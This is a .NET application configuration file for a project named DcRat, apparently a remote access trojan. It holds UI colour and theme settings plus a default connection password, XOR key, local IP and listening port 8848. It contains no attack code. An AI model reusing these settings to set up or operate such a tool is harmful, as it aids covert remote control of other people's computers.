<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="DcRat.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />
        </sectionGroup>
    </configSections>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
    </startup>
    <userSettings>
        <DcRat.Properties.Settings>
            <setting name="colorside" serializeAs="String">
                <value>Control</value>
            </setting>
            <setting name="colorsidedark" serializeAs="String">
                <value>45, 45, 48</value>
            </setting>
            <setting name="colortext" serializeAs="String">
                <value>81, 81, 81</value>
            </setting>
            <setting name="colortextdark" serializeAs="String">
                <value>240, 240, 240</value>
            </setting>
            <setting name="darkTheme" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="opacity" serializeAs="String">
                <value>97</value>
            </setting>
            <setting name="colorlistview" serializeAs="String">
                <value>White</value>
            </setting>
            <setting name="colorlistviewdark" serializeAs="String">
                <value>37, 37, 37</value>
            </setting>
            <setting name="colorlistviewtext" serializeAs="String">
                <value>Black</value>
            </setting>
            <setting name="colorlistviewtextdark" serializeAs="String">
                <value>White</value>
            </setting>
            <setting name="connectpassword" serializeAs="String">
                <value>qwqdanchun</value>
            </setting>
            <setting name="XorKey" serializeAs="String">
                <value>qwqdanchun</value>
            </setting>
            <setting name="IP" serializeAs="String">
                <value>127.0.0.1</value>
            </setting>
            <setting name="Port" serializeAs="String">
                <value>8848</value>
            </setting>
        </DcRat.Properties.Settings>
    </userSettings>
</configuration>